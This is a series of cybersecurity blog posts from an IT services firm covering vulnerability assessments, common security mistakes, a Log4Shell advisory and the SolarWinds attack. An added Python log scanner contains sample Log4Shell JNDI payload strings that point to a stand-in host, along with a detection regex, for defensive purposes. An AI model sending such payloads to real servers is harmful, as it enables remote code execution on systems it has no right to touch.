Category: cybersecurity

Vulnerability Assessment for Cyber Insurance

Cybersecurity and Ostrich-itis

When it comes to knowing your company’s security vulnerability status, if you’re not looking, everything probably looks perfect. It might sound obvious, but after reading Check Point’s yearly security report for 2022, it looks like vulnerabilities aren’t being remediated, which could mean companies aren’t even aware of their own organizational risk.

The following graph shows that 83 percent of attacks in 2021 used vulnerabilities that were at least two
years old with 42 percent being over 7 years old.

Why Cyber Insurance Needs Vulnerability Assessments

Either these vulnerabilities are being ignored, the risk is being accepted, or companies aren’t running the scans that would pinpoint them for remediation. Perhaps the belief is that “it will never happen to us” because we are too small a target and don’t have anything of value. The problem with this thought process is that you are putting your entire company at risk. Should a breach of confidential data occur, or a loss of system resources take your computer systems offline, your organization may be left unable to access its technical resources.

In the past, this risk has been reduced by transferring it to insurance companies. This now seems to be changing, as insurance companies are requiring best practices to be implemented before cyber insurance policies are finalized. This may include a requirement to complete a vulnerability assessment that details the vulnerabilities within your organization. This will allow you to be aware of risks to the organization.

Vulnerability Assessments & Management from Morefield

At Morefield, we provide vulnerability scans to organizations which include an initial vulnerability scan, providing various reports to allow remediation by the company, and a follow-up scan that shows remaining vulnerabilities left after remediation. We recommend that security patches are applied to systems and software to minimize exposed vulnerabilities and to minimize the possibility that defenses are penetrated. We support cybersecurity framework guidelines that recommend remediation for critical vulnerabilities within 30 days and high vulnerabilities within 60 days.

If you find yourself requiring a vulnerability scan to obtain cyber insurance, we can assist you in providing the information you need and work with you to prioritize remediation to fulfill the requirements for cyber insurance.

We also offer a vulnerability management solution to allow monthly scans to be completed and we work with the organization to discover, prioritize, assess, assist with remediation, verify, and report vulnerabilities.

Contact our team of experts today!

 

written by: Allan Jacks, vCISO (Virtual Chief Information Security Officer)

Top 5 Cybersecurity Mistakes That Leave Your Data at Risk

The global damage of cybercrime has risen to an average of $11 million USD per minute, which is a cost of $190,000 each second.
60% of small and mid-sized companies that have a data breach end up closing their doors within six months because they can’t afford the costs. The costs of falling victim to a cyberattack can include loss of business, downtime/productivity losses, reparation costs for customers that have had data stolen, and more.

You may think that this means investing more in cybersecurity, and it is true that you need to have appropriate IT security safeguards in place (anti-malware, firewall, etc.). However, many of the most damaging breaches are due to common cybersecurity mistakes that companies and their employees make.

The 2021 Sophos Threat Report, which looked at thousands of global data breaches, found that what it termed “everyday threats” were some of the most dangerous. The report stated, “A lack of attention to one or more aspects of basic security hygiene has been found to be at the root cause of many of the most damaging attacks we’ve investigated.”

Is your company making a dangerous cybersecurity mistake that is leaving you at high risk for a data breach, cloud account takeover, or ransomware infection? Here are several of the most common missteps when it comes to basic IT security best practices.

NOT IMPLEMENTING MULTI-FACTOR AUTHENTICATION (MFA)

Credential theft has become the top cause of data breaches around the world, according to IBM Security. With most company processes and data now being cloud-based, login credentials hold the key to multiple types of attacks on company networks.
Not protecting your user logins with multi-factor authentication is a common mistake and one that leaves companies at a much higher risk of falling victim to a breach.

MFA reduces fraudulent sign-in attempts by a staggering 99.9%.

IGNORING THE USE OF SHADOW IT

Shadow IT is the use of cloud applications by employees for business data that haven’t been approved and may not even be known about by a company.

Shadow IT use leaves companies at risk for several reasons:

• Data may be used in a non-secure application
• Data isn’t included in company backup strategies
• If the employee leaves, the data could be lost
• The app being used might not meet company compliance requirements

Employees often begin using apps on their own because they’re trying to fill a gap in their workflow and are unaware of the risks involved with using an app that hasn’t been vetted by their company’s IT team.

It’s important to have cloud use policies in place that spell out for employees the applications that can and cannot be used for work.

THINKING YOU’RE FINE WITH ONLY AN ANTIVIRUS APPLICATION

No matter how small your business is, a simple antivirus application is not enough to keep you protected. In fact, many of today’s threats don’t use a malicious file at all.

Phishing emails will contain commands sent to legitimate PC systems that aren’t flagged as a virus or malware. Phishing also overwhelmingly uses links these days rather than file attachments to send users to malicious sites. Those links won’t get caught by simple antivirus solutions.

You need to have a multi-layered strategy in place that includes things like:

• Next-gen anti-malware (uses AI and machine learning)
• Next-gen firewall
• Email filtering
• DNS filtering
• Automated application and cloud security policies
• Cloud access monitoring

NOT HAVING DEVICE MANAGEMENT IN PLACE

A majority of companies around the world have had employees working remotely from home since the pandemic, and they’re planning to keep it that way. However, device management for those remote employee devices as well as smartphones used for business hasn’t always been put in place.
If you’re not managing security or data access for all the endpoints (company and employee-owned) in your business, you’re at a higher risk of a data breach.
If you don’t have one already, it’s time to put a device management application in place, like Intune in Microsoft 365.

NOT PROVIDING ADEQUATE TRAINING TO EMPLOYEES

An astonishing 95% of cybersecurity breaches are caused by human error. Too many companies don’t take the time to continually train their employees, and thus users haven’t developed the skills needed for a culture of good cybersecurity.
Employee IT security awareness training should be done throughout the year, not just annually or during an onboarding process. The more you keep IT security front and center, the better equipped your team will be to identify phishing attacks and follow proper data handling procedures.

Some ways to infuse cybersecurity training into your company culture include:

• Short training videos
• IT security posters
• Webinars
• Team training sessions
• Cybersecurity tips in company newsletters

 

WHEN DID YOU LAST HAVE A CYBERSECURITY CHECKUP?

Don’t stay in the dark about your IT security vulnerabilities. Schedule a cybersecurity audit with Morefield to uncover vulnerabilities so they can be fortified to reduce your risk.

 

 

Article used with permission from The Technology Press.

Cybersecurity Speakers at PICPA 2022 Conference

Join Morefield at the Pennsylvania Institute Of Certified Public Accountants 2022 Conference

We are honored to have our Cybersecurity experts, Clinton Eppleman and Alex Thomas, participate in this year’s conference discussing cybersecurity in the financial industry. They will be joining the panel with fellow industry experts from Schneider Downs and Feeding Pennsylvania to discuss the most cutting-edge tools, tips, and tricks related to digital security, preventative and risk-mitigating cyberpractices & policy implementation for protecting your business.

Learn more at – https://www.picpa.org/attend-cpe-events/conferences/picpa-cfos-and-controllers-conference 

Day 2: Thursday, March 31, 2022

8:00 a.m.

Cybersecurity

  • Pursue the most cutting-edge tools, tips, and tricks related to digital security
  • Preventative and risk-mitigating cyberpractices
  • Policy implementation for protecting your business

Clinton Eppleman
Team Lead, IT Professional Services
Morefield Communications

Alexander Thomas
Team Lead
Morefield Communications

David B. Murphy
Lead Cybersecurity Analyst
Schneider Downs

Moderator: Shea S. Saman, CPA
Chief Financial Officer
Feeding Pennsylvania

Morefield Communications Security Advisory: Log4Shell CVE-2021-44228

Morefield Communications Cybersecurity and IT Operations team have been carefully monitoring a new vulnerability in the Log4J Java library which provides logging capabilities to various software. This new vulnerability (Log4Shell) allows a remote, unauthenticated attacker to force Java-based applications and servers to log a specific string into their internal systems, if using the Log4J library. When the application or server processes the logs, the string can force the vulnerable system to download and run a malicious script from an attacker-controlled domain, effectively taking over the vulnerable application or server.
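One way defenders can look for the string described above in web request logs, as an added example that is not part of the original advisory. The `${jndi:...}` lookup syntax is the publicly documented trigger for CVE-2021-44228; the log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import unquote

# JNDI lookup syntax that a vulnerable Log4j resolves when it logs a message.
# Group 1: lookup protocol, group 2: remote host the lookup points at.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z]+)://([^/:}\s]+)", re.IGNORECASE)

def decode(line, rounds=3):
    """Percent-decode repeatedly: proxies may log the value encoded more than once."""
    for _ in range(rounds):
        decoded = unquote(line)
        if decoded == line:
            break
        line = decoded
    return line

def scan(lines):
    """Return one finding per log line that carries a JNDI lookup string."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        match = JNDI_LOOKUP.search(decode(raw))
        if match:
            findings.append({
                "line": number,
                "source_ip": raw.split(" ", 1)[0],
                "protocol": match.group(1).lower(),
                # Host to block and to search for in DNS and firewall logs.
                "callback_host": match.group(2).lower(),
            })
    return findings

# Constructed access-log lines (documentation IP ranges, .example hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.45 - - [10/Dec/2021:09:14:09 +0000] "GET /?x=${jndi:ldap://callback.example/a} HTTP/1.1" 200 512',
    '203.0.113.46 - - [10/Dec/2021:09:15:31 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.example%2Fb%7D HTTP/1.1" 404 0',
    '198.51.100.9 - - [10/Dec/2021:09:16:44 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows that the string reached a log; whether the application behind it uses a vulnerable Log4J version still has to be checked separately.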

A significant number of applications are affected. We will be updating this post as new information and affected applications are discovered.

Listed below is a running list of some of the applications and/or server products affected:

  • Apache Software Foundation – Apache Struts, Apache Flink, Apache Druid, Apache Flume, Apache Solr, Apache Kafka, Apache Dubbo (not limited to these products)
  • VMware
  • Elasticsearch
  • Apple
  • Twitter
  • Amazon
  • Minecraft
  • Palo Alto
  • IBM
  • Cloudflare
  • JD
  • NetEase
  • Tencent
  • Todo
  • Baidu
  • Didi
  • Steam
  • Tenable
  • Tesla

BlueTeam CheatSheet * Log4Shell* – User community updated list of vulnerable applications

Additional Resources:

 

We expect more application vendors to report this vulnerability and we are diligently monitoring vendor responses for platforms and systems commonly deployed. We are committed to helping our clients make smart technology decisions while delivering outstanding service and expert solutions. If you have any questions, please contact your Network Administrator or Sales Representative.

Could SolarWinds Happen to Me?

TRUST.

Trust. You always have to trust someone in a digital world. The news headlines below describe a current reality: the largest cybersecurity attack in history is being unraveled in real time. To be fair, the attack was publicly disclosed a month ago in December, and experts are still trying to figure out the scope of compromise. Organizations of all sizes, utilizing the SolarWinds Orion platform, potentially installed a malicious update to this software platform. Ironically, the Orion platform is used to increase availability of resources – one of the three key pillars of cybersecurity.

Most of our clients do not have the budget or talent to develop their digital software in house, so they purchase software developed by a third party. Think about all of the different types of software you interact with on a daily basis: CRM, word processor, spreadsheet, email, etc. In each instance, some level of trust is required before you start to utilize these software packages. We likely don’t think twice about the software development process – we just care that it has the features and workflow that will move our organization forward. Perhaps we assume that these vendors make cybersecurity a priority during software development. Should we make this assumption?

Many small to mid-size organizations are not going to be able to influence the security considerations that go into an off-the-shelf software package. Your investment in the vendor’s product is a drop in the revenue bucket – take it or leave it.

In all fairness, many of the organizations that were targeted during the SolarWinds Orion compromise are very large organizations. They have a dedicated cybersecurity budget. Many take cybersecurity seriously and implement controls that make sense in their environment, and yet for months attackers went undetected in their network. The point here is that you can do all the “right” things, make the “right” technical control investments, and yet not achieve the outcome you expect.

A Security Information and Event Management (SIEM) platform is designed to digest logging data and then analyze it in a variety of ways. Such a platform can consume logging from any number of sources: firewalls, security tools, workstations, servers, etc. These data streams are then compared against various threat intelligence feeds to alert you to events that show some indicator of compromise. This real-time data can alert system administrators to potential security events that would otherwise go unnoticed. You can also conduct threat hunting exercises that review historical data when you learn about a zero-day (or novel) threat that has already happened, as with the SolarWinds incident – an attack that went undetected around the world for over six months.
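The correlation and retro-hunt steps described above, as an added example that is not part of the original article or of any vendor's product: events from several log sources are matched against a threat-intelligence feed, and hits that predate an indicator's publication are labelled as retro-hunt findings. All events, indicators, host names and dates are constructed.

```python
from datetime import datetime

def ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M")

# Constructed events, already normalised from several log sources.
EVENTS = [
    {"time": ts("2020-06-03 02:11"), "source": "dns", "host": "srv-mon01", "domain": "updates.badcdn.example"},
    {"time": ts("2020-06-03 02:12"), "source": "firewall", "host": "srv-mon01", "dst_ip": "203.0.113.80"},
    {"time": ts("2020-09-18 14:40"), "source": "proxy", "host": "wks-114", "domain": "intranet.corp.example"},
    {"time": ts("2020-12-20 08:05"), "source": "dns", "host": "srv-mon01", "domain": "UPDATES.badcdn.example"},
]

# Constructed threat-intelligence feed: each indicator carries its publication time.
INDICATORS = [
    {"field": "domain", "value": "updates.badcdn.example", "published": ts("2020-12-14 00:00")},
    {"field": "dst_ip", "value": "203.0.113.80", "published": ts("2020-12-14 00:00")},
]

def correlate(events, indicators):
    """Match every event field against the feed; label hits that predate the indicator."""
    index = {(i["field"], i["value"].lower()): i for i in indicators}
    hits = []
    for event in events:
        for field, value in event.items():
            indicator = index.get((field, str(value).lower()))
            if indicator is None:
                continue
            mode = "retro-hunt" if event["time"] < indicator["published"] else "live-alert"
            hits.append({"host": event["host"], "source": event["source"],
                         "indicator": indicator["value"], "time": event["time"], "mode": mode})
    return hits

def undetected_days(hits, indicators):
    """Per host: days between its first matching event and the indicator's publication."""
    published = {i["value"]: i["published"] for i in indicators}
    first_seen = {}
    for hit in hits:
        if hit["mode"] == "retro-hunt":
            host = hit["host"]
            first_seen[host] = min(first_seen.get(host, hit), hit, key=lambda h: h["time"])
    return {host: (published[h["indicator"]].date() - h["time"].date()).days
            for host, h in first_seen.items()}

if __name__ == "__main__":
    found = correlate(EVENTS, INDICATORS)
    for hit in found:
        print(hit["time"], hit["host"], hit["source"], hit["indicator"], hit["mode"])
    print(undetected_days(found, INDICATORS))
```

The retro-hunt only works for as long as the historical logs are retained, so log retention has to cover the period you expect to search.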

Written by Clinton Eppleman, CISSP, Team Lead, IT Professional Services, Morefield Communications

Boost Your CyberSecurity With Morefield Communications

We have partnered with Perch Security to deliver a managed SIEM service together with their Security Operations Center (SOC) – a team of hyper-focused cybersecurity professionals that monitors the logging from your network 24/7. The Perch solution helps to monitor your network at all times, and they will escalate any actionable events to your attention for remediation. This cloud-hosted solution will scale from just a few endpoints to thousands of devices.

Perch also helps organizations satisfy compliance requirements, for example: CMMC, HIPAA, SOX, PCI, etc. Many small organizations also use cybersecurity frameworks, such as the NIST Cyber Security Framework (CSF), to drive decision making and to facilitate creation of an organizational security policy. The Perch solution fits into the following CSF functions: Identification, Protection, Detection, and Response.

The outcome for a small business is clear when choosing security solutions: you can spend less of your time trying to find a needle in a haystack and more time focused on your business goals. We encourage you to reach out if you would like to learn more about the Perch Solution.

Contact Morefield Communications to learn what those network defenses are for you.
